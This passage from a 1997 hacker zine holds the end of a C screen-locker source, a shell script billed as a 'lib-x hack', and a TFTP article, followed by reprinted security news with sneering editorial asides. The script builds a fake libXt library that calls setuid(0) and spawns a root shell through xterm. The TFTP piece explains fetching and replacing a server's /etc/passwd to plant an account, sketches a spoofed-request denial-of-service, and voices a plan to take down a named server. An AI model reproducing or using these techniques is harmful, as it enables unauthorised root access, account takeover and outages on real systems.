                        (unsigned char *) &xwmh, sizeof(xwmh) / sizeof(int));
        }
#endif

        iconx[screen] = (DisplayWidth(dsp, screen) -
                         XTextWidth(font, text_info, strlen(text_info))) / 2;

        icony[screen] = DisplayHeight(dsp, screen) / 6;

        xswa.border_pixel = fgcol[screen];
        xswa.background_pixel = bgcol[screen];
        xswa.event_mask = ButtonPressMask;
#define CIMASK CWBorderPixel | CWBackPixel | CWEventMask
        icon[screen] = XCreateWindow(dsp, win[screen],
                                     iconx[screen], icony[screen],
                                     ICONW, ICONH, 1, CopyFromParent,
                                     InputOutput, CopyFromParent,
                                     CIMASK, &xswa);

        XMapWindow(dsp, win[screen]);
        XRaiseWindow(dsp, win[screen]);

        xgcv.foreground = WhitePixelOfScreen(scr);
        xgcv.background = BlackPixelOfScreen(scr);
        Scr[screen].gc = XCreateGC(dsp, win[screen],
                                   GCForeground | GCBackground, &xgcv);

        xgcv.foreground = fgcol[screen];
        xgcv.background = bgcol[screen];
        xgcv.font = font->fid;
        textgc[screen] = XCreateGC(dsp, win[screen],
                                GCFont | GCForeground | GCBackground, &xgcv);
    }
    lockc = XCreateBitmapFromData(dsp, root[0], no_bits, 1, 1);
    lockm = XCreateBitmapFromData(dsp, root[0], no_bits, 1, 1);
    mycursor = XCreatePixmapCursor(dsp, lockc, lockm,
                                   &nullcolor, &nullcolor, 0, 0);
    XFreePixmap(dsp, lockc);
    XFreePixmap(dsp, lockm);
    
    if (!enablesaver) {
        XGetScreenSaver(dsp, &sstimeout, &ssinterval,
                        &ssblanking, &ssexposures);
        XSetScreenSaver(dsp, 0, 0, 0, 0);       /* disable screen saver */
    }
#ifndef DEBUG
    GrabKeyboardAndMouse();
#endif
    nice(nicelevel);
    if (nolock)
        justDisplay();
    else
        lockDisplay();
    finish();
    return 0;
}   
------------------------------------------------------------
I've also provided one small code for an example of a lib-x hack.
------------------------------------------------------------
#!/bin/sh
mkdir /tmp/.werd
cd /tmp/.werd
cat << _EOF_ > Initialize.c
_XtAppInitialize() {
  setuid(0);
  execl("/bin/sh", "sh", 0);
}
XtAppSetFallbackResources() {}
_XtDisplayInitialize() {}
_EOF_
ar x /usr/lib/libXt.a
cc -c -pic Initialize.c
ld *.o
mkdir lib lib/X
mv a.out lib/X/libXt.so.4.1
cd lib/X
echo "git reddy for da fun, du0dz"
xterm

------------------------------------------------------------
theLURK3R - http://home.earthlink.net/~rseal/index.htm  
Personal Greetz: 
Channels: #Virii #Phreak #Hackers 
People: Hibislea FA-Q Darcangel ICBM _RefluX_ Wrd btm Scud-O memor
_____________________________________________________________

�1997 HAVOC Bell Systems Publishing
No part of this publication may be reproduced in whole or in part without the 
expressed written consent of HAVOC Bell Systems Publishing.  THTJ is all 
natural, contains no preservatives, and absolutely no lead.  Do not read THTJ
while operating heavy machinery.  Do not give THTJ to your favorite operator.
Do not pass go.  Do not collect $200.  Smoking THTJ may cause cancer.
Plagiarizing this publication is a crime against humanity.
_____________________________________________________________
                                   
                                  ---------- 
                                 --=[TFTP]=--
                               Written by Scud-O
                                  ----------

[TFTP: Weaknesses and Exploits]

What follows is nether a new exploit or a big one. It is simply a small
program with holes that are often overlooked, since it is needed for many
purposes on a UNIX system.

What the hell is it?
^^^^^^^^^^^^^^^^^^^^

TFTP stands for Trival File Transfer Protocol. It is a very simple file
protocol, and it does not have error checking. It is different from FTP in 
two main ways. First, it does not log in to the machine it is remotely 
getting files from, and Second, it uses UDP ( User Datagram Protocol ) not 
TCP. TFTP uses the standard port 69 even though TCP is not used. TFTP is not 
used very much , since FTP has more features, and error control. However, 
TFTP is often used on diskless workstations and embedded systems. Since TFTP 
does not have to use the OS, it can be installed on a tiny EPROM with UDP and 
a network driver.

Ok, So What?
^^^^^^^^^^^^

Well, since TFTP uses UDP, no logins are made, and if the sysadmin has not
plugged up tftp or tftpd, then you practically have root, since you can get
any file you wish! While many systems are still open to tftp, many sites have
started to plug up tftp, or even ban connections to it, since security
releases are starting to come out about its holes.
        Anyway, since tftp can both get AND send files, you can first get the
sites /etc/passwd, and then upload the new one you added with your new 
account that you of course added to the file. However, as far as i know, this 
is a limited attack, since tftpd seems to be set up with a default to not get
files, only to put files. But you can still get the file and try to crack it.

        [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^]
        [ TFTP Command Set                                ]
        [-------------------------------------------------]
        binary             Uses binary mode for transfers
        connect            Connect to server
        get                Get file
        put                Put file
        trace              Displays protocol codes
        verbose            Displays all information


        NOTE: There are 3 modes of transfer available for TFTP to use:
                 o NetASCII: Standard ASCII, default transfer
                 o Byte : 8-bit bytes and binary (remember typing in binary?)
                 o Mail : Indicates destination is a user not a file, info
                          is transfered as NetASCII.


[An Example TFTP Session]

limbo~#: tftp
tftp> connect smarty.smart.net
tftp> trace
Packet tracing on.
tftp> verbose
Verbose mode on.
tftp> status
Connected to smarty.smart.net
Mode: octet Verbose: on Tracing: on
Rexmt-interval: 5 seconds, Max-timeout: 25 seconds
ftfp> get /etc/passwd (or what ever file you want)
getting from smarty.smart.net:/etc/passwd to /tmp/passwd [octet]
sent RRQ <file=/etc/passwd, mode=octet>
received DATA <block1, 512 bytes>
send ACK <block=1>
received DATA <block2, 512 bytes>
send ACK <block=3>
received DATA <block4, 448 bytes>
send ACK <block=3>
Received 1472 bytes in 0.2 seconds 46080 bits/s
tftp> quit
limbo~#:

So basically, this is what a typically tftp transfer looks like, with most of
the options enabled. Now, dont try this at home, since smart.net's tftp now
only spits out a time out error message when you try this. ( well, you can
try it if you like, but it is pretty much pointless, since you will only get
the error.)

[TFTP Packets]
        Well, since TFTP uses UDP as its transport protocol, TFTP uses the
UDP header to encapsulate TFTP protocol information. It uses UDP's source
and destination ports to set the connection up, and it accomplishes this by
the use of TFTP Transfer Identifiers, AKA TIDs, which then places all this
stuff in the headers. Anyway, TFTP uses 5 types of Protocol Data Units,
and they are:

        RRQ and WRQ: [ Opcode ][ Filename ][0][ Mode  ][0]
                     ( 2 bytes) (String)      (String)

        DATA       : [ Opcode ][ Block Number][0]
                     ( 2 bytes)  ( 2 bytes)

        ACK        : [ Opcode ][ Block Number]
                     ( 2 bytes)  ( 2 bytes)

        Error      : [ Opcode ][ Block Number][Error Message][0]
                     ( 2 bytes)  ( 2 bytes)     (String)

TFTP Opcodes:
                ACK    4  Acknowledgment
                DATA   3  Send Data
                Error  5  Error
                RRQ    1  Read request
                WRQ    2  Write request


Ok, So what the hell do I need to know all about the TFTP protocol for?
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Well , its very simple, with this information, you have all you will need to
contruct yet another Denial of Service attack. Write a simple C program that
basically uses one of those easily found IP Spoofers, and then add a system()
call to tftp and ask it to get an odd file, that probably doesnt exist, such
as, well, etc/this.file.doesnt.exist , for example. Then when the server is
trying to reply with an error to a non-existant server, you will be quickly
slowing the remote system to a halt. ( hell, i have an experiment, i am
probably going to write this code out ( i didn't this month since it would
take up alot of room, and i am majorly behind deadline) and see how long it
would take to kill nether.net . I think that i will go down fairly fast since
the server is so fuckin lagged, since it has about a million users on, and
since it is ann arbor's undernet site.)

Well, that is all on TFTP. Check out the files section of our HBS site, since
if i get the TFTP DOS code, i will add it there.
_____________________________________________________________
                                
                                --------------   
                               --=[The News]=--
                        Compiled & edited by KungFuFox
                                --------------

     1 : AOL 'Hacker Riot' More Like Amateur Hour
     2 : Bug or Feature? Redmond Slow To Respond
     3 : Technocops fight hacker threat  
     4 : Linux Faithful Defuse Bliss Panic
     5 : Did Croatian teen hackers break Pentagon codes? 
     6 : Cracking Enjoys Renaissance in Eastern Europe
     7 : Nokia Rolls Out Wireless Pay Phone
     8 : Survey sounds alarm about computer crime 
     9 : NASA Web site briefly closed due to hackers 
     10: Shockwave Security Hole Leaves Email Exposed
     11: H.323: It's 'Open Sesame' in Firewall Speak
     12: Go Ahead, Be Paranoid : Hackers Are Out to Get You 
     13: Threat of 'techno' terrorism being explored
     14: Usenet Servers under Assault
     15: Usenet News Servers Take a Beating
     16: Man waits 20 years for phone line but dies before getting it
     17: Only in California... [I love California, but that's the title.]
       
        "Adolescent crackers wreak havoc to get attention and stoke 
        their egos." -Felipe Rodriquez, Founder of xs4all, a 
        Holland-based ISP
_____________________________________________________________

 AOL 'Hacker Riot' More Like Amateur Hour
 by Mark Glaser 
 [This article made me sick, but I was laughing at the same time]
 
 8:57am PST 17 Feb 97 -- After threatening America Online with a raging 
 "hacker riot" that would toss people out of chat rooms, cancel accounts, and 
 spread viruses, the so-called Valentine's Day Massacre was mostly noise and 
 bluster, signifying nothing. 

And many AOL users would have been hard-pressed to tell if there was a riot 
going on: They wouldn't have known if any access problems were due to hackers 
or AOL's overloaded systems, according to David Cassel, who maintains the AOL 
List at aolsucks.org. 

A message had been forwarded to hundreds of AOL users, saying that hackers 
would rampage at 9 p.m. EST. Planning meetings for the hackers were held at 6 
p.m. to plot strategy. At the appointed hour, more than 300 hackers gathered 
in private chat rooms and distributed at least seven different programs to 
"create hell on AOL," according to one eyewitness. 

The hackers then fanned out to public rooms and proceeded to do basic tricks 
of the trade: scrolling text too fast to read, kicking out chatters, and 
using macros that spewed out text like "RIOT!!! RIOT!!! RIOT!!!" and "Get 
Ready to Corrupt." The hackers, who went by screen names such as ReVOLTnow 
[Which trade do they think those are 'basic tricks' of?  Damn lamers...] and 
Lov2HakU, caused havoc into the night but most damage was cosmetic: There 
were no reports of viruses or downed servers, and many of the troublemakers 
had their rogue accounts cancelled. 

The hacking was reportedly a reponse to AOL's recent shoddy service. Many of 
[There's that word again, 'hacking'.  If I had a nickel for every time I 
mistook a warez kiddie for a hacker, I'd be broke.] the hackers trade pirated 
software in private chat rooms, named "wares," and were mad at the recent 
spate of busy signals due to AOL's ramped-up membership. 

But most observers and veteran AOL users attributed the attack to bored 
teenagers who were not adept hackers. One AOL chat room guide called the 
attack "pretty lame." [At least somebody knows what they're talking about.]

Cassel said that the riot was probably the work of amateurs. "Real hackers 
wouldn't publicize their activities in advance," he said. "And AOL is such a 
big target with pretty low security (despite what they say). This was an 
opportunity for these hackers to send a message to AOL and to pound their chest a bit." 

AOL maintains that the riot did only minor damage, and downplayed fears of 
viruses by saying that only downloaded and executed files could wreak havoc. 
Cassel, a longtime critic of AOL, said that its 3.0 software has the ability 
to update users' software without asking permission. If hackers could access 
that capability, viruses could be spread and cause a great deal of damage. 
Company spokespeople refused to comment on that possibility. 

This is not the first such attack on AOL. In the fall of 1995, AOL came down 
on software piracy of Macromedia products and punished some hackers. The 
piraters exacted revenge by rioting during a Macworld forum, taking over the 
stage and reportedly stealing AOL chairman Steve Case's email account. 
  
�1993-97 Wired Ventures, Inc. 
_____________________________________________________________

 Bug or Feature? Redmond Slow To Respond
 by Kate Farnady 
 [This is the story before microsoft got to edit it.]

 11:55am 4.Mar.97.PST -- Microsoft is "too busy looking at the big picture," 
 said Paul Greene, the discoverer of the latest Microsoft Explorer 3.0 
 security hole - a bug that Green says has been in the software since its 
 release on 13 August 1996. "They're missing the details," he said. 

Greene said he happened upon the bug - which can remotely trigger the 
execution of files on the user's machine - last week, by accident. He and his 
two roommates, Geoff Elliott and Brian Morin, juniors at Worcester 
Polytechnic Institute, first notified Microsoft via email at 4 a.m. last 
Thursday. 

Elliott said Microsoft PR assured him that the bug was not a big deal. In 
order for this bug to work, said the email, the perpetrator must have the 
aliased program on his hard drive and know where the file is stored. 

Greene responded to Microsoft's ambivalence with a public Web site, 
Cybersnot, that demonstrates the bug. The site launched on Saturday. 

Paul Balle, Microsoft product manager for Internet Explorer, said Microsoft 
first learned about the bug on Monday. 

"As soon as we found out about it, we immediately deployed a team of project 
managers and developers to address the issue," said Balle, who told Wired 
News that they had a fix for the bug in testing, and that it would be posted 
to Microsoft's Web site within the next 24 hours. 

Greene discovered the bug while doing group work, using a Web site to pass 
along files. He used the IE option to create a "shortcut," or alias to a file 
stored on his hard disk, and then placed it in the HTML on his Web site. The 
three students found that by embedding a .lnk or .url tag in the HTML, a user 
can create an alias which will open a program on the unsuspecting Web 
surfer's desktop. 

Says Morin, "Everyone is looking at Java and ActiveX, and not looking closely 
enough at what happens when the browser is tied so closely to the desktop." 
This bug is unrelated to ActiveX. 

"There are plenty of programs that come with Windows that can do a lot of 
damage," says Elliott. For example, a link could be created that might 
automatically open the format utility that MSIE stores in the Command folder. 
This could potentially erase the Web surfer's hard disk. "And that's only one 
of the many things that might strike terror in the hearts of PC users," says 
Paul. 

Further, the three students found that IE's cache folder stores files not in 
the folder itself, but in a subdirectory. Unlike Netscape, which scrambles 
the file names in the cache folder, IE stores the files, names intact, in a 
hidden subdirectory. 

"We assume Microsoft suspected this might be a security risk," says Elliott, 
"otherwise why would they have created a hidden folder." With access to the 
cache subdirectory, a malicious user could make use of the shortcut bug to 
place any file on the unsuspecting surfer's hard disk. 

But the bug, and Microsoft's ambivalent response to the student's email, 
haven't soured these PC users. "Nobody is handling security on the Internet 
very well," says Elliott. "We don't know how to connect 6 million computers 
with high security. The Web hasn't had the 20 years Unix has had [to develop 
security], and even Unix isn't secure." 

Elliott told Wired News of spending the morning thinking of ways to use this 
bug as a browser virus. "But we're bored of that," he explains. "The sad 
thing is, this could really be a great feature," says Greene. "It could be 
used to help fix things on your desktop." 

�1993-97 Wired Ventures, Inc. 
_____________________________________________________________

 Technocops fight hacker threat  
 March 2, 1997
 From Correspondent Louise Schiavone  

 WASHINGTON (CNN) -- When criminals rob a bank, you call the police. When 
 they break into an office building and threaten mayhem, you call the SWAT 
 team.  

But how about when they break into your computer system and wreak havoc? Is 
there someone to call? You bet. Meet CERT -- the Computer Emergency Response 
Team.  

"Late Friday afternoons are often times of crisis moments for a site. They 
may find that their site has been compromised and they can't wait until 
Monday to deal with it," explains Kathy Fithen, manager of CERT Daily 
Operations.  

These -- well, computer nerds -- are the rescue team of the future. And 
according to the Justice Department, the future is already here.  

"These crimes are becoming more serious, there's more money at stake and the 
crimes are more malicious," says Martha Stansell-Gamm of the U.S. Justice 
Department. "We are seeing more destruction, more threats, more theft of 
valuable information in general." [WE are seeing more corruption, more theft 
from the taxpayers, and more lies, so fuck off.]

Not long ago, a hacker invaded Internet access provider Erol's system with 
an obscene, racist message for its 140,000 subscribers.  

Last summer, hackers broke into the Justice Department's Web site, posting 
swastikas and pictures of Adolf Hitler.  

And a few years ago, two college students hacked their way into Boeing's 
computers in search of password files. The Justice Department says that 
situation is a classic case of how hackers can drive up business costs.  

"We were also able to ascertain that these hackers had obtained root access 
to the federal courthouse system in Seattle. After the case was over, it 
cost Boeing, I believe, $57,000 simply to check the integrity of their 
avionics data," Stansell-Gamm says.  

Based at Carnegie Mellon University in Pittsburgh, CERT works with the 
federal government, using mostly Defense Department dollars.  

CERT doesn't claim to be a policing agency, and many businesses have their 
own team of computer emergency specialists to stay one step ahead of the 
technocriminals of the '90s.  

In fact, last year a survey of Fortune 1,000 firms found that more than half 
had detected attempts to gain computer access. At least 11 attempts were 
successful.  
_____________________________________________________________

 Linux Faithful Defuse Bliss Panic
 by Kristi Coale 

 7:43pm 26.Feb.97.PST -- An anti-virus software company is busily 
 backpedalling after announcing earlier this month that it had "discovered" 
 and countered the first Linux virus. 

"[Bliss] is a stupid virus," said Joe Wells, a software consultant who 
maintains an index of proliferating computer viruses. "It's an alarmist 
approach that draws people's attention to something that's not a real threat 
and takes their eyes off the things that are boring but more of a threat," he 
said. 

McAfee Software, a developer of anti-viral software, announced it had 
discovered and created an antidote for Bliss on 6 February. The company 
claimed that the hostile code was infecting Linux operating systems - a 
popular free version of Unix. But the tone of the announcement raised the ire 
of Linux users on the blinux-list mailing list. 

While McAfee said the Bliss virus wasn't widespread, its announcement 
characterized the virus as serious and spreading in the public domain. But 
Bliss was not destructive. It was distributed primarily as "proof of concept" 
code (i.e., proof that a Linux virus could exist), to people on a security 
mailing list who knew what it was. 

"I learned a lot of lessons from Bliss," admitted Jimmy Kuo, senior virus 
researcher for the Santa Clara, California-based McAfee Software. "Bliss 
sounded more scary than it should have been. [In subsequent releases] we have 
tried to include more technical information." 

Wells said Bliss is an overwriter virus, a piece of code that destroys its 
host. Without a host, a virus has little chance of spreading. This led Wells 
and other anti-virus experts, including Dave Chess, research staff member at 
IBM's Thomas J. Watson Research Laboratory, to conclude that Bliss is not 
much of a threat. 

Bliss exists mostly for people to run on their systems as a study of virus 
behavior, a common practice among those who work on anti-viral technologies, 
said Chess. "When it's infecting, it will tell you - infecting:(file name) 
and it keeps a log on the disk of the infected files," he said. Further, the 
program saves clean copies of every file that it infects. 

Kuo, a well-respected anti-virus researcher, said a part of the confusion 
over Bliss stemmed from the different interpretations of such expressions as 
"in the wild," the phrase the anti-viral community uses to describe a virus 
that is in the public domain and therefore poses a threat. To Kuo, a virus 
has to meet five criteria before it is "in the wild," including the existence 
of a critical mass of users of an operating system. 

"Many people are running Linux at home on $800 machines. When the number of 
users of a platform goes up, the average user's technical capability goes 
down," said Kuo. 

Linux had been virus-free since its initial release in 1991. Kuo said it 
takes two to three years for viruses to catch up with new operating systems. 

With that criterion, Bliss is the sign that Linux has attained the status of 
an established platform. Bliss is also a warning that other hostile code 
awaits, said Wells, who noted that of the 10,000 viruses in existence, only 
200 to 300 pose a real threat. 

"[Bliss] will be just like the Boza fiasco [the first Windows 95 virus] last 
year, and people will know it's possible to write viruses for Linux," said 
Wells. 
 
�1993-97 Wired Ventures, Inc.
_____________________________________________________________

 Did Croatian teen hackers break Pentagon codes? 
 February 20, 1997
 
 ZAGREB, Croatia (Reuter) -- Three teen-age computer hackers in Croatia may 
 have broken Pentagon protection codes and copied highly classified files 
 from U. S. military bases, local media reported.  

The Zagreb daily Vecernji List said Wednesday that the three high school 
students, surfing the Internet on their home computer, applied a search 
program and deciphered codes, barging into the database of several military 
installations.  

The databases included those of the Anderson nuclear installation and an 
unnamed satellite research center, the newspaper reported.  

However, Pentagon officials expressed doubt this could have happened.  

"There is no way that anybody can tap into classified files via the 
Internet," Pentagon spokeswoman Lt. Col. Donna Boltz told Reuters.  

Such files, she said, are almost always on closed systems without outside 
access. But personal e-mail or other sensitive files might be invaded by 
hackers on the Internet, she added.  

After the news broke, reporters flocked to the high school in the Adriatic 
port of Zadar where the three teens, ages 15 and 16, specialize in 
mathematics and informatology.  

One of the hackers, identified only as V.M., told the state news agency HINA 
he accessed the Pentagon data base while surfing the net January 2.  

Despite being warned that he was not allowed to proceed, he continued to 
browse the site until the data of the Anderson base were displayed on the 
screen, HINA said.  

"The data are compressed and need to be extracted, so I don't really know 
everything they contained, but it sure was very interesting," V.M. told the 
agency. [Top-notch ueberleeter wows reporters with a buncha technical jargon
about his oly stumbling block - he couldn't unzip the shit he stole.] He 
maintained he was unaware of any possible consequences.  

�1997 Reuters Limited.
_____________________________________________________________
      
 Cracking Enjoys Renaissance in Eastern Europe
 by Kristi Coale 

 4:43am 28.Feb.97.PST -- A smoldering indignation lies at the root of the 
 recent attacks on US Pentagon computers by Eastern European crackers. 

The West, and particularly the United States, is a prized target of these 
crackers, who see these breaches as an opportunity to jeer at the United 
States' perceived technological superiority. The US and other Western 
countries are basking in the glow of the information revolution, a movement 
that has created a new industry from which many are earning a healthy living. 

Meanwhile, life in the former Communist countries of Eastern Europe is less 
sanguine. The march toward democratic systems is slow, and jobs are not easy 
to find for those with the technological skills. With time on their hands, 
they press their knowledge of networks and computer languages into service 
via cracking. 

"People in Eastern Europe are well-educated, yet they can't make money and 
attain living standard of their often less-educated Western peers - which 
builds up a resentment," said expatriate Croatian journalist Ivo Skoric via 
email. 

"So the education basically just makes us unhappy - because we are able to 
see and understand how very well fucked up we are: education in this case 
gives both tools and reasons to do [cracking]," he said. 

In January, three Croatian high school students cracked their way into 
Pentagon computers and accessed what they believed to be Pentagon secrets. 
The Pentagon, which has said that no classified information was compromised 
in the attack, apparently sustained considerable damage - approximately 
US$500,000, according to the Zagreb daily newspaper Vecernji List. 

The Pentagon refutes these claims. "There was no information or indication 
that classified information was accessed," said Major Chris Geisel, Air Force 
spokesman. "The amount of the damage won't be determined until after the 
investigation is finished." [In other words, "we're still too embarrassed to
tell you how much damage was done."]

In the meantime, the Air Force is working closely with Croatian police to 
investigate the incident, Geisel said. 

This break-in is one of several originating from Eastern European countries 
in recent months. In January, a Romanian teenager set off a series of ping 
and syn-flood attacks against a number of IRC servers around the world. And 
Bosnia and Croatia have been home to other cracking incidents involving 
Pentagon computers, said Skoric. Earlier this month, youths in Zlatar 
Bistrica, a small town north of Zagreb, broke into Pentagon computers and had 
their equipment seized by Croatian police. 

Adolescent crackers wreak havoc to get attention and stoke their egos, said 
Felipe Rodriquez, a founder of xs4all, a Holland-based ISP. In the case of 
the Croatian high school students, their teacher and parents celebrated their 
actions as an achievement made possible by their technical acumen. 

But cracking is on the rise in Eastern Europe mostly because people can get 
away with it: There are no laws against these activities. 

Internet service providers and others in the Eastern European technical 
community attribute this gap in law enforcement to the lack of understanding 
by the populace that cracking is considered a crime in other countries. 

The attacks also stem from a different set of priorities in a region whose 
economic and governmental systems are in flux, said Tin Blaskovic, a Croatian 
university student. 

"You have to understand that countries in transition have bigger problems on 
their backs, like stabilizing [a] newly established system," Blaskovic said 
via email. "When that is completely done, I believe something will be done 
about such problems as cracking." 

Western European countries such as Holland channel the energies of crackers 
toward developing more secure computer systems. 

In Holland, cracking is now illegal, but it used to be a "hacker's haven," 
said Rodriquez, whose ISP employs a number of ex-crackers to develop security 
systems. Other former crackers Rodriquez knows are busy developing smartcards 
for banks, setting up the first Dutch freenet system, and writing encryption 
software. In fact, xs4all, set up by former crackers, was the first ISP in 
The Netherlands, Rodriquez said. 

"We do not believe hackers should be repressed. Instead, they should be 
stimulated to use their talents creatively; to secure poorly designed 
systems," he said. [Any hacker that does that is called a fucking sellout.]

�1993-97 Wired Ventures, Inc.
_____________________________________________________________

 Nokia Rolls Out Wireless Pay Phone
 by Gene Koprowski 

 2:41pm 4.Mar.97.PST -- Nokia America has introduced a new digital wireless 
 phone that is designed to bring pay telephone service to buses, subway 
 trains, and taxi cabs over the global system for mobile (GSM) network. But a 
 top telecom analyst questioned whether the device would be appropriate for 
 all those venues. [Big smile]

The small, wireless pay phone, the GSM 1900, was revealed at the Cellular 
Telecommunications Industry Association trade show in San Francisco this 
week. Nokia spokeswoman Megan Matthews said the product operates over the the 
same network technology, GSM, which is employed by Personal Communications 
Service Providers. 

Nokia has inked deals with the PCS purveyors for trials in "several markets" 
to test the 1900-MHz technology on public transportation, she said. Matthews 
would not reveal where the products will being tested. 

A 900-MHz version of the technology that works with overseas cellular 
standards has been sold to phone companies in Thailand. The technology has a 
sizable graphical user interface, and hands-free functionality. 

"This is an additional way for the new PCS providers to make more money on 
their network," said Matthews. "They are able to provide a service that 
cannot be achieved by a conventional pay-phone system. You can go and stick 
one up on a wall and it will work. You don't need an additional black box. 
There is a built-in transceiver." 
[Oh what I wouldn't do to rip one of these.]
Matthews says that public wireless phones could have been implemented years 
ago, but were not, largely because the cellular-phone market was dominated by 
Bell companies, which already had an infrastructure of landline-based pay 
phones in place. The price of the phone calls is likely to be priced 
comparably to standard wireless phone calls, not at the rate that is akin to 
calls for air phones. 

"It will probably be very similar to what their air time rates are for 
regular wireless subscribers," Matthews said. "It be a lot cheaper (than air 
phones on airplanes). If you were in a subway system, you wouldn't want to 
pay US$25 for a call. You might as well go to the wire line." 

The company does not envision users plunking quarters into the device, 
however. Credit cards or charge cards will be used to pay for the services. 
The phones can also interact with smart cards or electronic-purse 
applications. [Carders, start your engines.]

David Cooperstein, a telecom strategies analyst at Forrester Research, said 
the marketers of the technology have to make a compelling argument to users 
in order to generate demand. "Pay phones are everywhere in this country," 
says Cooperstein. "If it is going to be more expensive than your typical pay 
phone, then there has to be some compelling reason to use it, like it is more 
available than the pay phones that are already out there. If it is more 
expensive, people would probably just wait a few more minutes to get to the 
regular pay phone." 

�1993-97 Wired Ventures, Inc.
_____________________________________________________________
                                
 Survey sounds alarm about computer crime 
 March 7, 1997
 
 SAN FRANCISCO (Reuter) -- A computer security group sounded an alarm about 
 computer crime Thursday after U.S. companies and other organizations it 
 surveyed reported losing $100 million due to high-tech crime.  
[Let's just call it downsizing of profits.]
Three-quarters of the 563 U.S. corporations, government agencies, financial 
institutions and universities that responded to the survey by the Computer 
Security Institute reported suffering financial losses in the last 12 months 
due to computer security breaches.  

The breaches ranged from computer viruses and laptop theft to financial 
fraud, theft of proprietary information and sabotage.  
[Sabotage is not recommended unless your employer is evil.]
Losses suffered by the 249 organizations that were able to estimate them 
totaled $100 million in the last year, said the Computer Security Institute, 
a San Francisco-based association of information security professionals.  

Institute Director Patrice Rapalus said the survey's findings about 
financial losses due to security breaches "should sound the alarm for 
corporations and government agencies."  

She said the level of awareness of computer crime had risen slightly since 
the institute carried out its first survey last year but most organizations 
still were not doing enough to counter it.  

Richard Power, a spokesman for the institute, said it was likely that 
computer crime cost billions of dollars each year in the United States, 
although this was not based on data from the survey.  

Power said there was a need for more information security staff, more 
security training for computer network administrators and for greater 
cooperation between the private sector and law enforcement.  

The organizations reported $24.9 million in losses from financial fraud, 
$22.7 million due to telecommunications fraud, $21 million from theft of 
proprietary information, $4.3 million from sabotage of data or networks, 
$12.5 million from computer viruses and $6.1 million from theft of laptop 
computers, the institute said.  
[If you count laptops as warez, we got figures on the whole H/P/C/V/A/W
scene's success right there.]
The number of organizations that suffered an intrusion or other unauthorized 
use of computer systems in the last 12 months rose to 49 percent in the 
latest survey from 42 percent in the 1996 survey, the institute said.  

However, only 17 percent of respondents who suffered computer intrusions 
reported them to law enforcement, the survey found. Fear of negative 
publicity was a key reason organizations did not report them, it found.  

�1997 Reuters Limited.
_____________________________________________________________

 NASA Web site briefly closed due to hackers 
 March 7, 1997
 
 CAPE CANAVERAL, Florida (Reuter) -- Computer hackers found their way into 
 NASA's No. 1 site on the World Wide Web and posted a political manifesto, 
 forcing the U.S. space agency to take the popular location off-line, a 
 spokeswoman said Thursday.  

The hackers, who called themselves H4G13, left a message online Wednesday 
claiming responsibility for the intrusion.  

Brian Dunbar, NASA's Internet services manager, said the group berated 
officials for jailing well-known hackers and promised to launch an attack on 
corporate America for commercial use of the internet. 

"During the next month, we the members of H4G13 will be launching an attack 
on corporate America. All who profit from the misuse of the Internet will 
fall victim to our upcoming reign of digital terrorism," the message said.  
[Hopefully skepticism that they won't go through with their threat isn't 
accurate.]

The message was up for about half an hour and the site was operating as 
usual Thursday morning, Dunbar said.  

It was the first time hackers had ever broken into that NASA server, which 
is located at the Goddard Space Flight Center in Greenbelt, Maryland. NASA 
officials said they would move the public Web page, at www.nasa.gov, to a 
new server.  

Besides providing information for public use, the server is used by NASA 
scientists and researchers to exchange information on solar research. The 
data is considered "proprietary," but not classified. It was not clear 
whether the hackers had had access to the data.  

Dunbar said NASA was investigating the incident.  

�1997 Reuters Limited.
_____________________________________________________________

 Shockwave Security Hole Leaves Email Exposed
 by Michael Stutz 

 10:02am 13.Mar.97.PST -- Last week, the Web security booby prize went to 
 Microsoft Internet Explorer. This week, it's Netscape's turn. 

The latest hole to be added to the list of recent security gaffes involves 
Macromedia Shockwave and Netscape Navigator. A malicious user can read and 
copy a Web surfer's private email - including supposedly deleted messages - 
without their knowledge, and even access internal Web servers behind 
corporate firewalls. 

David de Vitry, an application developer at Poppe Tyson Interactive, 
discovered the security hole and announced Monday on his Web site that 
Netscape users who have installed Macromedia's Shockwave plug-in are at risk.

Shockwave was recently awarded Best World Wide Web Plug-In by the Software 
Publisher's Association. Macromedia claims the free software is installed on 
more than 20 million desktops. 

To demonstrate the flaw, de Vitry set up a Web page that shows how a Web 
server can obtain your email upon connecting - no links or forms need be 
selected. 

"I was just browsing my Netscape Mail and I discovered how Netscape handles 
addressing email," said de Vitry, referring to Netscape's use of the mailbox 
URN. "It took me by surprise, and [the means] to implement [the hole] just 
sort of clicked with my Shockwave experience." 

Utilizing the default path to a Windows user's mailbox - 
C:/Program Files/Netscape/Navigator/Mail/Inbox - and sending a mailto: query 
with Shockwave's GETNETTEXT command, a cracker could develop a Shockwave 
movie that reads the user's current email. With a few more commands, that 
email could be saved to a data variable and sent back to the Web server, 
where it could be copied and saved. 

By changing the path from the Inbox to, say, the Trash, a Shockwave movie 
could then retrieve email messages that were thought deleted by the user. 

"It's much like accessing a file, because you're just accessing a mail file. 
With the mailbox URN you can access any file on the system as long as its in 
the same format, which is text with email headers," said de Vitry. 

"Because of the security model, Java applets can't access files on your 
computer. Shockwave doesn't have the same security model," said de Vitry. 
"Unlike the other [recent security holes], which allowed you to erase a 
person's hard drive (and, through complicated means, obtain information), 
this one you can easily get information back. It has interesting uses." 

Using these same concepts, it's possible to break the security of corporate 
firewalls. "The other main vulnerability," said de Vitry, "is the fact that 
it can use [the Web's] hypertext transfer protocol to access any Web server." 
Including those on secure intranets - provided you know the URL. 

The victim must be using Netscape Navigator 3.0, or possibly 2.0, on either 
the Windows 95 or Windows NT platform, and have Macromedia's Shockwave 
plug-in installed. Finally, Netscape Email must be used as the email 
interface. 

While de Vitry claims he informed both Netscape and Macromedia late Tuesday 
night, neither company has contacted him. 

Dave Kennedy, research team chief with the National Computer Security 
Association, commented that "[The security breach] doesn't surprise me, and I 
predict it will happen more in the future. Internet Explorer had three last 
week, Java had one, and now it's Netscape's turn in the barrel. 

"I have more confidence in Netscape than Internet Explorer with respect to 
the security of their different products," said Kennedy. "But with the 
plug-in problem, my peers in the security community are scared of the 
implications of the increased user functions without regard to security," he 
said. 

Shockwave is Macromedia's proprietary technology for delivering and 
experiencing multimedia over the Web for Windows or Macintosh computers. The 
plug-in modules are created with Macromedia's Director multimedia authoring 
tool. 

As of Wednesday evening, Mary Leong of Macromedia said the company had been 
